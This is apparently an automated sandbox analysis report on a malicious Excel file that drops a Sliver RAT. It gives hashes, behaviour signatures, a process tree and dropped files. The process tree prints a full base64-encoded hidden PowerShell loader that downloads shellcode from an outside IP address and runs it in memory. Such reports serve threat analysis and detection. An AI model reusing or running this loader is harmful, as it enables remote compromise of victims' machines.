Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-11-2024 21:16

General

  • Target

    dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls

  • Size

    46KB

  • MD5

    a26cd351baea6159ea1979a56dad21db

  • SHA1

    83ef2c3be02025d90d4d443cf3fe1fc84277fcb2

  • SHA256

    dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578

  • SHA512

    f42fe4fc3e7be31638c602ced0c9611a4f182f9f5bad82234d0df9872a58db5fd6980855237ca6078eabf90a6e2208f945d94442619a54fd7577d25c05700eb2

  • SSDEEP

    768:D4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:ESFsv66g3KnF439NKC54kkGfn+cL2Xd+

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Sliver RAT v2 6 IoCs
  • Sliver family
  • SliverRAT

    SliverRAT is an open source Adversary Emulation Framework.

  • Blocklisted process makes network request 32 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1256
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp" "c:\Users\Admin\AppData\Local\Temp\phphutyt\CSC2A904C096FD447478D207CE19AE7F1.TMP"
          4⤵
            PID:3452

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp

      Filesize

      1KB

      MD5

      7778d4e820e391232ea60fa3873fdd89

      SHA1

      fd3b5d53047bf4c1a5f16560ebc41d66a6ff13d6

      SHA256

      b5cdf462a9a28fc0b065c10f5451c926eecf128532d99fd436e4f9664b5964de

      SHA512

      d4fbbb0faa605335ebd640fa6e12adb337e05d97e43a52ad57409514cf7cb10b95f1efe542a2d687534444cba9b94b210ed845680a7bd87b4008b477303aa231

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yqwjavry.nki.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.dll

      Filesize

      3KB

      MD5

      856cf077c25c603f01aeb7dadd5f753e

      SHA1

      ce9d50265de193cdde5ec84d25bc2819dc5b8ed2

      SHA256

      a8c38cd2026cdc21d43e8c1ae6fe2bf36c8c42b5ef1149b2717933d656454cf8

      SHA512

      9962dcd4d55abac42bfaa94beaf867b2c205987e6c8906988c81cd2cee7471c5aafb7163743c3c8fe52598f764f49a0fc88ed9b2bbb0b57984b175816baa0aa9

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      1KB

      MD5

      b7039431a29d664ae0a6e28d2a030a7a

      SHA1

      b8c9192498057085b130146ea17775b3baf32dbf

      SHA256

      d860cc29eceb19347215999a95032a3cf5d4cbc8b7cf95059f6ea8d44dd25c64

      SHA512

      3794a5bc89a56f7168caea9b9ba95fbda1ad56714d3e3dc69659c794aa738df0519d68812564dda50e819c97887546c65a76791205b042f1df17f4bbc8536d4d

    • \??\c:\Users\Admin\AppData\Local\Temp\phphutyt\CSC2A904C096FD447478D207CE19AE7F1.TMP

      Filesize

      652B

      MD5

      7b9a81e634a234ab28f3b53fcb3526f1

      SHA1

      7a627ae55d53dc0ea53677e93cf2fda70dfe0fed

      SHA256

      06a87569b6882f9308573fc517204028ae2d4b1bd82d3c7bad321b141ed0cd12

      SHA512

      00e36f5f09d80dff7f027345a13c16edb303fb27333ad32c6208db61a3e5182a44a63cfec4b66abaaf7ad0ebd1d9d2ff954b18d4fa023d61e2116aa60ed6c0b6

    • \??\c:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline

      Filesize

      369B

      MD5

      3e174c33287fbd83920a12442c4d0a4d

      SHA1

      cd0ffea739bfc65ed49524a86e2af800e40a2fb3

      SHA256

      4aafc0e3444dfa58b4a5ae2fdbdd52ceb742b9f2dc4f16310dbd116a698b60f1

      SHA512

      5052d3205b006f65f5911e6053619f03f0dd1dc4e13393dad19944a5aaf59dcb9a0729ac42ac51fad9ac236c861d74fc1d1c1f35723dbcd7cfae0d4fa0356b4f

    • memory/1516-11-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-60-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-4-0x00007FF846470000-0x00007FF846480000-memory.dmp

      Filesize

      64KB

    • memory/1516-9-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-12-0x00007FF844410000-0x00007FF844420000-memory.dmp

      Filesize

      64KB

    • memory/1516-8-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-13-0x00007FF844410000-0x00007FF844420000-memory.dmp

      Filesize

      64KB

    • memory/1516-14-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-17-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-16-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-18-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-15-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-28-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-27-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-5-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-3-0x00007FF846470000-0x00007FF846480000-memory.dmp

      Filesize

      64KB

    • memory/1516-6-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-7-0x00007FF846470000-0x00007FF846480000-memory.dmp

      Filesize

      64KB

    • memory/1516-2-0x00007FF846470000-0x00007FF846480000-memory.dmp

      Filesize

      64KB

    • memory/1516-0-0x00007FF846470000-0x00007FF846480000-memory.dmp

      Filesize

      64KB

    • memory/1516-1-0x00007FF88648D000-0x00007FF88648E000-memory.dmp

      Filesize

      4KB

    • memory/1516-67-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-10-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1516-61-0x00007FF88648D000-0x00007FF88648E000-memory.dmp

      Filesize

      4KB

    • memory/3924-62-0x000001E3FB440000-0x000001E3FBEBE000-memory.dmp

      Filesize

      10.5MB

    • memory/3924-65-0x000001E3FC940000-0x000001E3FD426000-memory.dmp

      Filesize

      10.9MB

    • memory/3924-66-0x000001E3FC940000-0x000001E3FD426000-memory.dmp

      Filesize

      10.9MB

    • memory/3924-64-0x000001E3FC940000-0x000001E3FD426000-memory.dmp

      Filesize

      10.9MB

    • memory/3924-63-0x000001E3FC940000-0x000001E3FD426000-memory.dmp

      Filesize

      10.9MB

    • memory/3924-56-0x000001E3FAB20000-0x000001E3FAB28000-memory.dmp

      Filesize

      32KB

    • memory/3924-36-0x000001E3FAB30000-0x000001E3FAB52000-memory.dmp

      Filesize

      136KB

    • memory/3924-76-0x000001E3FC940000-0x000001E3FD426000-memory.dmp

      Filesize

      10.9MB